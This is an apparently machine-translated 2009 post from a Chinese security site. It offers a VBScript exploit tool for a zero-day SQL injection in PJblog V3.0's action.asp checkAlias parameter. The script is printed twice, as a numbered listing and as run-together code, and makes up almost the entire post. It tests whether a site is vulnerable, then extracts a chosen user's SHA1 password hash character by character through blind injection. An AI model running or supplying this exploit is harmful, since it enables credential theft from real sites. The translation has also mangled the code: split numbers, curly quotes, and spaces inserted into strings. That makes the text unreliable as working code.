PJblog V3. 0 0day Vbs version of the exploit tool-vulnerability warning-the black bar safety net

2009-04-23T00:00:00
ID MYHACK58:62200923024
Type myhack58
Reporter 佚名
Modified 2009-04-23T00:00:00

Description

Vulnerability details please see<http://0kee.com/read.php?tid-908.html>on my computer there is no install php, just write a Vbs version of the exploit Tool, the specific code as follows:

  1. If WScript. Arguments. Count <> 2 Then

  2. WScript. Echo “Usage: Cscript.exe Exp. vbs to detect the forum URL you want to detect the user name”

  3. WScript. Echo “Example: Cscript.exe Exp. vbs http://www.pjhome.net puterjam”

  4. WScript. Quit

  5. End If

    1. attackUrl = WScript. Arguments(0)
  6. attackUser = WScript. Arguments(1)

  7. attackUrl = Replace(attackUrl,“\”,”/“)

1 0. If Right(attackUrl , 1) <> ”/“ Then

1 1. attackUrl = attackUrl & ”/“

1 2. End If

1 3. SHA1Charset = ”123456789ABCDEFJ“

1 4. strHoleUrl = attackUrl & ”action. asp? action=checkAlias&cname=0kee“”“

1 5. 1 6. If IsSuccess(strHoleUrl & ”r“”1“”=“”1“) And Not IsSuccess(strHoleUrl & ”and“”1“”=“”2“) Then

1 7. WScript. Echo ”congratulations! The presence of vulnerability“

1 8. Else

1 9. WScript. Echo ”there is no vulnerability detected“

2 0. WScript. Quit

2 1. End If

2 2. 2 3. For n=1 To 4 0

2 4. For i=1 To 1 7

2 5. strInject = strHoleUrl & " Or 0<(Select Count(*) From blog_member Where mem_name='" & amp; attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And""1""=""1"

2 6. If Not IsSuccess(strInject) Then

2 7. strResult = strResult & Mid(SHA1Charset, i-1, 1)

2 8. Exit For

2 9. End If

3 0. strPrint = chr(1 3) & “Password(SHA1): ” & strResult & Mid(SHA1Charset, i, 1)

3 1. WScript. StdOut. Write strPrint

3 2. Next

3 3. Next

3 4. WScript. Echo Chr(1 3) & Chr (1 0) & “Done!”

3 5. 3 6. Function PostData(PostUrl)

3 7. Dim Http

3 8. Set Http = CreateObject(“msxml2. serverXMLHTTP”)

3 9. With Http

4 0. . Open “GET”,PostUrl,False

4 1. . Send ()

4 2. PostData = . ResponseBody

4 3. End With

4 4. Set Http = Nothing

4 5. PostData =bytes2BSTR(PostData)

4 6. End Function

4 7. 4 8. 4 9. Function bytes2BSTR(vIn)

5 0. Dim strReturn

5 1. Dim I, ThisCharCode, NextCharCode

5 2. strReturn = “”

5 3. For I = 1 To LenB(vIn)

5 4. ThisCharCode = AscB(MidB(vIn, I, 1))

5 5. If ThisCharCode < &H80 Then

5 6. strReturn = strReturn & Chr(ThisCharCode)

5 7. Else

5 8. NextCharCode = AscB(MidB(vIn, I + 1, 1))

5 9. strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))

6 0. I = I + 1

6 1. End If

6 2. Next

6 3. bytes2BSTR = strReturn

6 4. End Function

6 5. 6 6. Function IsSuccess(PostUrl)

6 7. 6 8. strData = PostData(PostUrl)

6 9. ‘Wscript. Echo strData

7 0. if InStr(strData,“check_error”) >0 then

7 1. IsSuccess = True

7 2. Else

7 3. IsSuccess = False

7 4. End If

7 5. ‘Wscript. Sleep 5 0 0 ’let system rest.

7 6. End Function

7 7. 7 8. 7 9. 8 0. If WScript. Arguments. Count <> 2 Then WScript. Echo "Usage: Cscript.exe Exp. vbs to detect the forum URL you want to detect the user name" WScript. Echo "Example: Cscript.exe Exp. vbs http://www.pjhome.net puterjam" WScript. Quit End If

attackUrl = WScript. Arguments(0) attackUser = WScript. Arguments(1) attackUrl = Replace(attackUrl,"\","/") If Right(attackUrl , 1) <> "/" Then attackUrl = attackUrl & "/" End If SHA1Charset = "0123456789ABCDEFJ" strHoleUrl = attackUrl & "action. asp? action=checkAlias&cname=0kee"""

If IsSuccess(strHoleUrl & "or""1""=""1") And Not IsSuccess(strHoleUrl & "and""1""=""2") Then WScript. Echo "congratulations! The presence of vulnerability" Else WScript. Echo "there is no vulnerability detected" WScript. Quit End If

For n=1 To 4 0 For i=1 To 1 7 strInject = strHoleUrl & " Or 0<(Select Count(*) From blog_member Where mem_name='" & attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And""1""=""1" If Not IsSuccess(strInject) Then strResult = strResult & Mid(SHA1Charset, i-1, 1) Exit For End If strPrint = chr(1 3) & "Password(SHA1):" & strResult & Mid(SHA1Charset, i, 1) WScript. StdOut. Write strPrint Next Next WScript. Echo Chr(1 3) & Chr(1 0) & "Done!"

Function PostData(PostUrl) Dim Http Set Http = CreateObject("msxml2. serverXMLHTTP") With Http . Open "GET",PostUrl,False . Send () PostData = . ResponseBody End With Set Http = Nothing PostData =bytes2BSTR(PostData) End Function

Function bytes2BSTR(vIn) Dim strReturn Dim I, ThisCharCode, NextCharCode strReturn = "" For I = 1 To LenB(vIn) ThisCharCode = AscB(MidB(vIn, I, 1)) If ThisCharCode < &H80 Then strReturn = strReturn & Chr(ThisCharCode) Else NextCharCode = AscB(MidB(vIn, I + 1, 1)) strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) I = I + 1 End If Next bytes2BSTR = strReturn End Function

Function IsSuccess(PostUrl)

strData = PostData(PostUrl) 'Wscript. Echo strData if InStr(strData,"check_error") >0 then IsSuccess = True Else IsSuccess = False End If 'Wscript. Sleep 5 0 0 'let system rest. End Function

Usage: Cscript.exe Exp. vbs to detect the forum URL you want to detect the user name

from:<http://www.pcsec.org/archives/Pjblog-v3-0day-exp-vbs.html>